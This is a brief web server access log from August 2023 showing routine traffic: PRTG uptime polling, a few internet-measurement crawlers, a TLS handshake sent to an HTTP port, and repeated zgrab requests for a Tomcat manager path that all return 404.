198.199.98.149 - - [04/Aug/2023:13:01:39 +0200] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
198.199.98.149 - - [04/Aug/2023:13:01:42 +0200] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
198.199.98.149 - - [04/Aug/2023:13:01:42 +0200] "GET /manager/text/list HTTP/1.1" 404 322 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [04/Aug/2023:13:01:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:13:02:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:13:03:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.236.176.157 - - [04/Aug/2023:13:04:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
205.210.31.84 - - [04/Aug/2023:13:04:31 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Aug/2023:13:04:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:13:05:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.67.136.168 - - [04/Aug/2023:13:06:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; tchelebi/1.0; +http://tchelebi.io)"
212.91.246.72 - - [04/Aug/2023:13:06:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:13:07:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:13:08:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:13:09:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Aug/2023:13:10:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
